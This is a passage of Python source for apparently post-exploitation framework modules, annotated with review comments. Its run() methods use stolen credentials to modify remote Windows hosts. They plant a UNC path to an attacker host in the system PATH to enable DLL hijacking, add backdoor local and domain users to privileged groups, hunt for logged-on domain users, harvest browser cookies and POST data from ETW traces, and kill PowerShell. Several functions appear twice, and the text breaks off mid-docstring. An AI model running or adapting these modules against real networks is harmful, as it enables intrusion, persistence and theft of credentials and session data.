def run(self):
    """Prepend a UNC share on *lhost* to each target's system PATH and record cleanup.

    Per target: reads the Path value from the Session Manager\\Environment key,
    rewrites it as "\\\\<lhost>\\system\\;<existing path>" and, on
    "The operation completed successfully.", sets CWDIllegalInDllSearch to 0.
    Each successful change appends an
    "executeCommand|target|user|pass|<command>|trigger" line to self.cleanup
    that restores the original Path and sets CWDIllegalInDllSearch back to 2.
    Status lines go to self.output; only the first credential pair is used.

    NOTE(review): parts[1] raises IndexError when pathResult is "" — splitting
    an empty string yields one element — so a missing result file crashes the
    query step instead of being reported.
    NOTE(review): when no existing Path is parsed, the REG ADD still runs with
    newPath == "" and overwrites the machine-wide Path with an empty value.
    NOTE(review): regResult2 is never inspected; the "UNC loading successfully
    set" line is appended unconditionally.
    """
    # assume single set of credentials (take the first one)
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    lhost = self.required_options["lhost"][0]

    for target in self.targets:
        existingPath, newPath = "", ""

        # reg.exe to get the current path
        pathCMD = "reg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path"
        pathResult = command_methods.executeResult(target, username, password, pathCMD, triggerMethod)

        # parse the PATH output (CRLF-separated lines from reg.exe)
        parts = pathResult.split("\r\n")

        # check if we get a valid result: line 2 is the key name, line 3 is
        # "    Path    REG_EXPAND_SZ    <value>", so the value is field 3 onward
        if parts[1].startswith("HKEY"):
            regParts = parts[2].split()
            existingPath = " ".join(regParts[2:])

        if existingPath != "":
            newPath = "\\\\" + lhost + "\\system\\;" + existingPath
        else:
            # NOTE(review): only a warning — execution continues with newPath == ""
            print helpers.color(" [!] Error: No path found\n", warning=True)

        regCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \"" + newPath + "\""
        regResult = command_methods.executeResult(target, username, password, regCMD, triggerMethod)

        if regResult == "":
            self.output += "[!] No result file, reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "The operation completed successfully." in regResult:
            self.output += "[*] reg PATH successfully set with \\\\" + lhost + "\\system using creds '" + username + ":" + password + "' on : " + target + "\n"

            # add in our cleanup command to restore the original PATH
            cleanupCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \"" + existingPath + "\""
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

            # allow \\UNC loading in %PATH% :)
            regCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 0"
            regResult2 = command_methods.executeResult( target, username, password, regCMD2, triggerMethod)
            # NOTE(review): regResult2 is not checked before claiming success
            self.output += "[*] reg command to allow UNC loading successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"

            # cleanup -> make everything more secure by disable UNC/SMB loading
            cleanupCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 2"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD2 + "|" + triggerMethod + "\n"
        else:
            self.output += "[!] reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n"

    # print a message if command succeeded on at least one box
    # NOTE(review): self.output is also non-empty after failures, so this hint
    # is appended whenever anything at all was logged
    if self.output != "":
        self.output += "[*] run ./tools/dll_monitor.py to monitor for .dll hijacking"
def run(self):
    """Report members of domain *group* that have a process or session on each target.

    Per target: runs `net group "<group>" /domain`, keeps the lines after the
    "-----" marker (dropping the first line and the last three) and splits
    them into lower-cased names. It then collects `tasklist /V /FO CSV` and
    `qwinsta` and does a case-insensitive substring search for each name in
    both outputs, appending a line to self.output (and printing one) per hit,
    with a one-second pause after each. If nothing matched on any target,
    self.output is set to "[!] No users found\\n".

    NOTE(review): result.find("-----") returns -1 when the marker is absent, so
    the slice becomes the last character of result rather than an empty list.
    NOTE(review): substring matching means a short name (e.g. "bob") also
    matches longer names containing it.
    NOTE(review): triggerMethod is hard-coded to "winexe" here, while other
    modules read it from required_options["trigger_method"].
    """
    # assume single set of credentials
    username, password = self.creds[0]
    group = self.required_options["group"][0]
    triggerMethod = "winexe"

    for target in self.targets:
        targetUsernames = []

        # net command to query the domain group
        # we want to do this on each box so we can operate across domains!
        command = "net group \"%s\" /domain" % (group)
        result = command_methods.executeResult(target, username, password, command, triggerMethod)

        # TODO: sanity check that we get a correct file back?

        # find the ---------- marker, get the bottom half, split by newline
        # and extract just the name fields
        nameParts = result[result.find("-----"):].split("\r\n")[1:-3]

        for part in nameParts:
            targetUsernames.extend(part.lower().split())

        # check the task list on the host
        taskListResult = command_methods.executeResult( target, username, password, "tasklist /V /FO CSV", triggerMethod)

        # check the sessions list on the host
        sessionsResult = command_methods.executeResult( target, username, password, "qwinsta", triggerMethod)

        print ""

        # for each username in our target list, see if they show up in the queried results
        for u in targetUsernames:
            if u.lower() in taskListResult.lower():
                self.output += "[*] User '%s\\%s' has a process on %s\n" % ( group, u, target)
                print helpers.color( "\n [*] User '%s\\%s' has a process on %s!" % (group, u, target))
                time.sleep(1)

            if u.lower() in sessionsResult.lower():
                self.output += "[*] User '%s\\%s' has a session on %s\n" % ( group, u, target)
                print helpers.color( " [*] User '%s\\%s' has a session on %s!" % (group, u, target))
                time.sleep(1)

    # if we have no results, add message to the output
    if self.output == "":
        self.output = "[!] No users found\n"
def run(self):
    """Prepend a UNC share on *lhost* to each target's system PATH and record cleanup.

    Per target: reads the Path value from the Session Manager\\Environment key,
    rewrites it as "\\\\<lhost>\\system\\;<existing path>" and, on
    "The operation completed successfully.", sets CWDIllegalInDllSearch to 0.
    Each successful change appends an
    "executeCommand|target|user|pass|<command>|trigger" line to self.cleanup
    that restores the original Path and sets CWDIllegalInDllSearch back to 2.
    Status lines go to self.output; only the first credential pair is used.

    NOTE(review): parts[1] raises IndexError when pathResult is "" — splitting
    an empty string yields one element — so a missing result file crashes the
    query step instead of being reported.
    NOTE(review): when no existing Path is parsed, the REG ADD still runs with
    newPath == "" and overwrites the machine-wide Path with an empty value.
    NOTE(review): regResult2 is never inspected; the "UNC loading successfully
    set" line is appended unconditionally.
    """
    # assume single set of credentials (take the first one)
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    lhost = self.required_options["lhost"][0]

    for target in self.targets:
        existingPath, newPath = "", ""

        # reg.exe to get the current path
        pathCMD = "reg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path"
        pathResult = command_methods.executeResult(target, username, password, pathCMD, triggerMethod)

        # parse the PATH output (CRLF-separated lines from reg.exe)
        parts = pathResult.split("\r\n")

        # check if we get a valid result: line 2 is the key name, line 3 is
        # "    Path    REG_EXPAND_SZ    <value>", so the value is field 3 onward
        if parts[1].startswith("HKEY"):
            regParts = parts[2].split()
            existingPath = " ".join(regParts[2:])

        if existingPath != "":
            newPath = "\\\\"+lhost+"\\system\\;"+existingPath
        else:
            # NOTE(review): only a warning — execution continues with newPath == ""
            print helpers.color(" [!] Error: No path found\n", warning=True)

        regCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \""+newPath+"\""
        regResult = command_methods.executeResult(target, username, password, regCMD, triggerMethod)

        if regResult == "":
            self.output += "[!] No result file, reg PATH set failed using creds '"+username+":"+password+"' on : " + target + "\n"
        elif "The operation completed successfully." in regResult:
            self.output += "[*] reg PATH successfully set with \\\\"+lhost+"\\system using creds '"+username+":"+password+"' on : " + target + "\n"

            # add in our cleanup command to restore the original PATH
            cleanupCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \""+existingPath+"\""
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"

            # allow \\UNC loading in %PATH% :)
            regCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 0"
            regResult2 = command_methods.executeResult(target, username, password, regCMD2, triggerMethod)
            # NOTE(review): regResult2 is not checked before claiming success
            self.output += "[*] reg command to allow UNC loading successfully set using creds '"+username+":"+password+"' on : " + target + "\n"

            # cleanup -> make everything more secure by disable UNC/SMB loading
            cleanupCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 2"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD2+"|"+triggerMethod+"\n"
        else:
            self.output += "[!] reg PATH set failed using creds '"+username+":"+password+"' on : " + target + "\n"

    # print a message if command succeeded on at least one box
    # NOTE(review): self.output is also non-empty after failures, so this hint
    # is appended whenever anything at all was logged
    if self.output != "":
        self.output += "[*] run ./tools/dll_monitor.py to monitor for .dll hijacking"
def run(self):
    """Create a local user on each target and add it to a local group.

    Runs `net user <user> <pass> /add`; when the output contains
    "The command completed successfully", queues a `net user <user> /delete`
    cleanup entry and then runs `net localgroup <group> <user> /add`. The
    outcome of each step is appended to self.output; an empty result string is
    reported as "No result file". Only the first credential pair is used.

    NOTE(review): userToAdd/passToAdd/groupToAdd are read from required_options
    on every iteration although they do not depend on the target.
    NOTE(review): the cleanup entry is queued before the group add, so a user
    whose group add fails is still scheduled for deletion.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        userToAdd = self.required_options["user"][0]
        passToAdd = self.required_options["pass"][0]
        groupToAdd = self.required_options["group"][0]

        # command to add the user:password to the machine
        userAddCommand = "net user " + userToAdd + " " + passToAdd + " /add"
        # command to add the user to the specified localgroup
        groupAddCommand = "net localgroup " + groupToAdd + " " + userToAdd + " /add"

        # execute the user add command and get the result
        userAddResult = command_methods.executeResult( target, username, password, userAddCommand, triggerMethod)

        # check all of our results as appropriate
        if userAddResult == "":
            self.output += "[!] No result file, user add '" + userToAdd + ":" + passToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "The command completed successfully" in userAddResult:
            self.output += "[*] User '" + userToAdd + ":" + passToAdd + "' successfully added using creds '" + username + ":" + password + "' on " + target + "\n"

            # cleanup -> delete the user from the system
            cleanupCMD = "net user " + userToAdd + " /delete"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

            # if the user add command succeeded, continue to the group add
            groupAddResult = command_methods.executeResult( target, username, password, groupAddCommand, triggerMethod)

            if groupAddResult == "":
                self.output += "[!] No result file, user add of user '" + userToAdd + "' to localgroup '" + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "The command completed successfully" in groupAddResult:
                self.output += "[*] User '" + userToAdd + "' successfully added to localgroup '" + groupToAdd + "' using creds '" + username + ":" + password + "' on " + target + "\n"
            else:
                self.output += "[!] User add '" + userToAdd + "' to localgroup '" + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        else:
            self.output += "[!] User add '" + userToAdd + ":" + passToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
    """Report members of domain *group* that have a process or session on each target.

    Per target: runs `net group "<group>" /domain`, keeps the lines after the
    "-----" marker (dropping the first line and the last three) and splits
    them into lower-cased names. It then collects `tasklist /V /FO CSV` and
    `qwinsta` and does a case-insensitive substring search for each name in
    both outputs, appending a line to self.output (and printing one) per hit,
    with a one-second pause after each. If nothing matched on any target,
    self.output is set to "[!] No users found\\n".

    NOTE(review): result.find("-----") returns -1 when the marker is absent, so
    the slice becomes the last character of result rather than an empty list.
    NOTE(review): substring matching means a short name (e.g. "bob") also
    matches longer names containing it.
    NOTE(review): triggerMethod is hard-coded to "winexe" here, while other
    modules read it from required_options["trigger_method"].
    """
    # assume single set of credentials
    username, password = self.creds[0]
    group = self.required_options["group"][0]
    triggerMethod = "winexe"

    for target in self.targets:
        targetUsernames = []

        # net command to query the domain group
        # we want to do this on each box so we can operate across domains!
        command = "net group \"%s\" /domain" %( group )
        result = command_methods.executeResult(target, username, password, command, triggerMethod)

        # TODO: sanity check that we get a correct file back?

        # find the ---------- marker, get the bottom half, split by newline
        # and extract just the name fields
        nameParts = result[result.find("-----"):].split("\r\n")[1:-3]

        for part in nameParts:
            targetUsernames.extend(part.lower().split())

        # check the task list on the host
        taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod)

        # check the sessions list on the host
        sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod)

        print ""

        # for each username in our target list, see if they show up in the queried results
        for u in targetUsernames:
            if u.lower() in taskListResult.lower():
                self.output += "[*] User '%s\\%s' has a process on %s\n" %(group, u, target)
                print helpers.color("\n [*] User '%s\\%s' has a process on %s!" %(group, u, target))
                time.sleep(1)

            if u.lower() in sessionsResult.lower():
                self.output += "[*] User '%s\\%s' has a session on %s\n" %(group, u, target)
                print helpers.color(" [*] User '%s\\%s' has a session on %s!" %(group, u, target))
                time.sleep(1)

    # if we have no results, add message to the output
    if self.output == "":
        self.output = "[!] No users found\n"
def run(self):
    """Extract the domain SID from `whoami /user` output on each target.

    For every output line containing "S-", the line is split into
    (user, full SID) and the domain SID is the full SID with its trailing
    "-<rid>" component removed. The SID is printed and recorded in
    self.output; if no line produced a SID, a failure line is recorded.

    NOTE(review): `group` is not defined in this method, so the empty-result
    branch raises NameError instead of appending its message. The comment
    "query the domain group" appears copied from another module.
    NOTE(review): `user, sid_full = line.split()` assumes exactly two
    whitespace-separated fields; any other line containing "S-" raises
    ValueError.
    NOTE(review): trigger_method is hard-coded to "wmis" here.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    trigger_method = "wmis"

    for target in self.targets:
        # command to print the current user's SID
        command = "whoami /user"
        result = command_methods.executeResult(target, username, password, command, trigger_method)

        if result == "":
            # NOTE(review): `group` is undefined here -> NameError
            self.output += "[!] No result file, query for domain sid '" + group + "'' failed on " + target + "\n"
        else:
            sid = ""
            for line in result.split("\n"):
                if "S-" in line:
                    user, sid_full = line.split()
                    # extract the domain sid from the results
                    sid = "-".join(sid_full.split("-")[:-1])
                    print helpers.color("\n\n [*] Domain sid: " + sid)
                    time.sleep(2)
                    self.output += "[*] Domain sid extracted using creds '" + username + ":" + password + "' on " + target + ": " + sid + "\n"

            if sid == "":
                self.output += "[!] Couldn't extract domain sid from results using creds '" + username + ":" + password + "' on " + target + "\n"
def run(self):
    """Check whether PowerShell is installed on each target via the Install registry value.

    Runs `reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install` and
    classifies the result, in this order: an "error:" prefix, an empty string
    (no result file), "0x1" (installed), "0x0" (not installed), anything else
    (error; the raw result is printed). One line per target is appended to
    self.output.

    NOTE(review): "0x1" and "0x0" are substring tests on the whole output, so
    they also match other hex values containing those digits (e.g. 0x10).
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # reg.exe command to detect if powershell is installed
        command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
        result = command_methods.executeResult(target, username, password, command, triggerMethod)

        if result.startswith("error:"):
            self.output += "[!] Error '" + result + "' in detecting powershell using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif result == "":
            self.output += "[!] No result file, detect PowerShell failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "0x1" in result:
            self.output += "[*] PowerShell detected using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "0x0" in result:
            self.output += "[*] PowerShell not detected using creds '" + username + ":" + password + "' on : " + target + "\n"
        else:
            # unexpected output: echo it for diagnosis, then record an error
            print "result:", result
            self.output += "[!] Error in detecting PowerShell using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
    """Upload and run finddllhijack.exe on each target and save its output.

    Copies data/misc/finddllhijack.exe from VEIL_PILLAGE_PATH to
    C$\\Windows\\Temp\\ over SMB, executes it with a 5 second pause, deletes
    the binary again, and stores the captured output with
    helpers.saveModuleFile as finddllhijack.txt. An empty result is reported
    as a failure in self.output.

    NOTE(review): saveModuleFile is called even when `out` is empty, so an
    empty results file is written on failure.
    NOTE(review): the return values of uploadFile and the delete command are
    not checked; a failed upload falls straight through to the execute step.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    # local path of the helper binary and the remote path it is run from
    exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe"
    cmd = "C:\\Windows\\Temp\\finddllhijack.exe"

    for target in self.targets:
        # upload the binary to the host at C:\Windows\Temp\
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)

        # execute finddllhijack and get the results
        out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5)

        # cleanup: remove the uploaded binary
        command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)

        # save the file off to the appropriate location
        saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)

        if out != "":
            self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n"
        else:
            self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
def run(self):
    """Extract the domain SID from `whoami /user` output on each target.

    For every output line containing "S-", the line is split into
    (user, full SID) and the domain SID is the full SID with its trailing
    "-<rid>" component removed. The SID is printed and recorded in
    self.output; if no line produced a SID, a failure line is recorded.

    NOTE(review): `group` is not defined in this method, so the empty-result
    branch raises NameError instead of appending its message. The comment
    "query the domain group" appears copied from another module.
    NOTE(review): `user,sid_full = line.split()` assumes exactly two
    whitespace-separated fields; any other line containing "S-" raises
    ValueError.
    NOTE(review): trigger_method is hard-coded to "wmis" here.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    trigger_method = "wmis"

    for target in self.targets:
        # command to print the current user's SID
        command = "whoami /user"
        result = command_methods.executeResult(target, username, password, command, trigger_method)

        if result == "":
            # NOTE(review): `group` is undefined here -> NameError
            self.output += "[!] No result file, query for domain sid '"+group+"'' failed on " + target + "\n"
        else:
            sid = ""
            for line in result.split("\n"):
                if "S-" in line:
                    user,sid_full = line.split()
                    # extract the domain sid from the results
                    sid = "-".join(sid_full.split("-")[:-1])
                    print helpers.color("\n\n [*] Domain sid: "+sid)
                    time.sleep(2)
                    self.output += "[*] Domain sid extracted using creds '"+username+":"+password+"' on " + target + ": "+sid+"\n"

            if sid == "":
                self.output += "[!] Couldn't extract domain sid from results using creds '"+username+":"+password+"' on " + target + "\n"
def run(self):
    """Create a domain user from each target and add it to a domain group.

    Runs `net user <user> <pass> /add /domain`; when the output contains
    "The command completed successfully", queues a
    `net user <user> /delete /domain` cleanup entry and then runs
    `net group <group> <user> /add /domain`. The outcome of each step is
    appended to self.output; an empty result string is reported as
    "No result file". Only the first credential pair is used.

    NOTE(review): because the add is domain-wide, running against several
    targets repeats the same domain operation once per target; the second and
    later iterations fall into the failure branches.
    NOTE(review): userToAdd/passToAdd/groupToAdd are read from required_options
    on every iteration although they do not depend on the target.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        userToAdd = self.required_options["user"][0]
        passToAdd = self.required_options["pass"][0]
        groupToAdd = self.required_options["group"][0]

        # command to add the user:password to the domain
        userAddCommand = "net user "+userToAdd+" "+passToAdd+" /add /domain"
        # command to add the user to the specified domain group
        groupAddCommand = "net group "+groupToAdd+" "+userToAdd+" /add /domain"

        # execute the user add command and get the result
        userAddResult = command_methods.executeResult(target, username, password, userAddCommand, triggerMethod)

        # check all of our results as appropriate
        if userAddResult == "":
            self.output += "[!] No result file, domain user add '"+userToAdd+":"+passToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
        elif "The command completed successfully" in userAddResult:
            self.output += "[*] Domain user '"+userToAdd+":"+passToAdd+"' successfully added using creds '"+username+":"+password+"' on " + target + "\n"

            # cleanup -> delete the user from the domain
            cleanupCMD = "net user "+userToAdd+" /delete /domain"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"

            # if the user add command succeeded, continue to the group add
            groupAddResult = command_methods.executeResult(target, username, password, groupAddCommand, triggerMethod)

            if groupAddResult == "":
                self.output += "[!] No result file, domain user add of user '"+userToAdd+"' to group '"+groupToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "The command completed successfully" in groupAddResult:
                self.output += "[*] Domain user '"+userToAdd+"' successfully added to group '"+groupToAdd+"' using creds '"+username+":"+password+"' on " + target + "\n"
            else:
                self.output += "[!] Domain user add '"+userToAdd+"' to group '"+groupToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
        else:
            self.output += "[!] Domain user add '"+userToAdd+":"+passToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
    """Report which configured user names have a process or session on each target.

    The "user" option is either a path to a local file with one name per line
    (each line stripped) or a single name. Per target, `tasklist /V /FO CSV`
    and `qwinsta` are collected and every name is searched case-insensitively
    as a substring of each output; hits are appended to self.output. If no
    target produced a hit, self.output is set to "[!] No users found\\n".

    NOTE(review): an empty line in the names file becomes "" and "" is a
    substring of any output, so it yields a false "has process"/"has session"
    line for every target; skip blank lines when reading.
    NOTE(review): the file is opened without a context manager; `with open(...)`
    is the idiomatic form and closes it on error as well.
    NOTE(review): substring matching means a short name also matches longer
    names containing it.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    targetUsernames = []

    # if we're passed a file, read in the usernames
    if os.path.exists(self.required_options["user"][0]):
        f = open(self.required_options["user"][0])
        lines = f.readlines()
        f.close()
        for line in lines:
            # NOTE(review): blank lines are appended as "" and match everything
            targetUsernames.append(line.strip())
    # if we have just a single name, use just that
    else:
        targetUsernames.append(self.required_options["user"][0])

    for target in self.targets:
        # check the task list on the host
        taskListResult = command_methods.executeResult( target, username, password, "tasklist /V /FO CSV", triggerMethod)

        # check the sessions list on the host
        sessionsResult = command_methods.executeResult( target, username, password, "qwinsta", triggerMethod)

        # for each username in our target list, see if they show up in the queried results
        for u in targetUsernames:
            if u.lower() in taskListResult.lower():
                self.output += "[*] User '%s' has process on %s\n" % ( u, target)
            if u.lower() in sessionsResult.lower():
                self.output += "[*] User '%s' has session on %s\n" % ( u, target)

    # if we have no results, add message to the output
    if self.output == "":
        self.output = "[!] No users found\n"
def run(self):
    """Report which configured user names have a process or session on each target.

    The "user" option is either a path to a local file with one name per line
    (each line stripped) or a single name. Per target, `tasklist /V /FO CSV`
    and `qwinsta` are collected and every name is searched case-insensitively
    as a substring of each output; hits are appended to self.output. If no
    target produced a hit, self.output is set to "[!] No users found\\n".

    NOTE(review): an empty line in the names file becomes "" and "" is a
    substring of any output, so it yields a false "has process"/"has session"
    line for every target; skip blank lines when reading.
    NOTE(review): the file is opened without a context manager; `with open(...)`
    is the idiomatic form and closes it on error as well.
    NOTE(review): substring matching means a short name also matches longer
    names containing it.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    targetUsernames = []

    # if we're passed a file, read in the usernames
    if os.path.exists(self.required_options["user"][0]):
        f = open(self.required_options["user"][0])
        lines = f.readlines()
        f.close()
        for line in lines:
            # NOTE(review): blank lines are appended as "" and match everything
            targetUsernames.append(line.strip())
    # if we have just a single name, use just that
    else:
        targetUsernames.append(self.required_options["user"][0])

    for target in self.targets:
        # check the task list on the host
        taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod)

        # check the sessions list on the host
        sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod)

        # for each username in our target list, see if they show up in the queried results
        for u in targetUsernames:
            if u.lower() in taskListResult.lower():
                self.output += "[*] User '%s' has process on %s\n" %(u, target)
            if u.lower() in sessionsResult.lower():
                self.output += "[*] User '%s' has session on %s\n" %(u, target)

    # if we have no results, add message to the output
    if self.output == "":
        self.output = "[!] No users found\n"
def run(self):
    """Run the configured "command" option on each target and collect its output.

    For each target a header line followed by the raw result and a blank line
    is appended to self.output — but only when the result is non-empty; an
    empty result adds nothing. Only the first credential pair is used.

    NOTE(review): staying silent on an empty result makes a failed trigger
    indistinguishable from a command that produced no output; the other
    modules append a "[!] No result file" line in that case.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    command = self.required_options["command"][0]

    for target in self.targets:
        result = command_methods.executeResult(target, username, password, command, triggerMethod)

        if result != "":
            self.output += "[*] Results for '"+command+"' using creds '"+username+":"+password+"' on "+target+" : \n"
            self.output += result
            self.output += "\n\n"
def run(self):
    """Stop the Status32 ETW trace on each target, filter it for *flag* and delete it.

    Per target: runs `logman stop Status32 -ets`, then queries
    C:\\Windows\\Temp\\status32.etl with `wevtutil qe ... /f:Text` piped
    through `find /i "<flag>"` (20 second pause), deletes the .etl file, and
    stores any non-empty output via helpers.saveModuleFile as post_params.txt
    (flag "post") or cookies.txt (anything else, searched as "cookie added").

    NOTE(review): `flag` is overwritten inside the loop; the branch taken stays
    the same on later targets, but the original option value is lost.
    NOTE(review): the .etl file is deleted regardless of whether the parse
    step returned anything, so a pause that is too short for the host
    presumably loses the trace data — the comment above parseCmd says as much.
    NOTE(review): the stop and delete results are not checked.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    flag = self.required_options["flag"][0]

    for target in self.targets:
        # stop the ETW
        stopCMD = "logman stop Status32 -ets"
        command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)

        # search for cookies or POST paramters
        if flag.lower() == "post":
            flag = "POST"
            moduleFile = "post_params.txt"
        else:
            flag = "cookie added"
            moduleFile = "cookies.txt"

        # check the ETW results for the specified flag, and delete the dump file
        parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\""

        # wait 20 seconds for everything to parse...if errors happen, increase this
        parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)

        # delete the trace file
        delCmd = "del C:\\Windows\\Temp\\status32.etl"
        command_methods.executeCommand(target, username, password, delCmd, triggerMethod)

        if parseResult == "":
            self.output += "[!] No ETW results for " + flag + " using creds '" + username + ":" + password + "' on : " + target + "\n"
        else:
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
            self.output += "[*] ETW results for " + flag + " using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
def run(self):
    """Run `net users /domain` on each target and append the raw listing.

    An empty result is reported as "No result file"; otherwise the output is
    appended under a per-target header. triggerMethod is hard-coded to
    "winexe". Only the first credential pair is used.

    NOTE(review): the success header is prefixed "[!]" (the other modules use
    "[*]" for success) and spells "sucessful"; both are runtime strings, so
    they are left as-is here.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = "winexe"

    for target in self.targets:
        # net command to list domain users
        command = "net users /domain"
        result = command_methods.executeResult(target, username, password, command, triggerMethod)

        if result == "":
            self.output += "[!] No result file, query for domain user failed using creds '"+username+":"+password+"' on " + target + "\n"
        else:
            self.output += "[!] Query for domain users sucessful on " + target + ":\n"
            self.output += result + "\n"
def run(self):
    """Run `net users /domain` on each target and append the raw listing.

    An empty result is reported as "No result file"; otherwise the output is
    appended under a per-target header. triggerMethod is hard-coded to
    "winexe". Only the first credential pair is used.

    NOTE(review): the success header is prefixed "[!]" (the other modules use
    "[*]" for success) and spells "sucessful"; both are runtime strings, so
    they are left as-is here.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = "winexe"

    for target in self.targets:
        # net command to list domain users
        command = "net users /domain"
        result = command_methods.executeResult(target, username, password, command, triggerMethod)

        if result == "":
            self.output += "[!] No result file, query for domain user failed using creds '" + username + ":" + password + "' on " + target + "\n"
        else:
            self.output += "[!] Query for domain users sucessful on " + target + ":\n"
            self.output += result + "\n"
def run(self):
    """Force-terminate powershell.exe on each target.

    Runs `taskkill /f /im powershell.exe` and treats "SUCCESS" anywhere in
    the output as success; any other output, including an empty result file,
    is recorded as a failure in self.output.

    NOTE(review): an empty result (no result file) is folded into the generic
    "failed to terminate" message rather than reported separately as the
    other modules do.
    NOTE(review): triggerMethod is passed by keyword here and positionally in
    the other modules; fine as long as executeResult's parameter is named
    triggerMethod — TODO confirm against command_methods.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    # kill all powershell processes
    killCMD = "taskkill /f /im powershell.exe"

    for target in self.targets:
        # execute the command on the host and get the output
        out = command_methods.executeResult(target, username, password, killCMD, triggerMethod=triggerMethod)

        if "SUCCESS" in out:
            self.output += "[*] Powershell processes terminated using creds '"+username+":"+password+"' on "+target+"\n"
        else:
            self.output += "[*] Powershell processes failed to terminate using creds '"+username+":"+password+"' on "+target+"\n"
def run(self):
    """Disable Remote Desktop on each target by setting fDenyTSConnections to 1.

    Runs `reg add ...\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 1 /f`.
    An empty result is recorded as "No result file" and
    "The operation completed successfully" as success.

    NOTE(review): there is no else branch, so any other output (an access
    denied message, for instance) leaves nothing in self.output for that
    target; the UAC module below records an error line in that case.
    NOTE(review): no cleanup entry is queued, so the change is not reverted
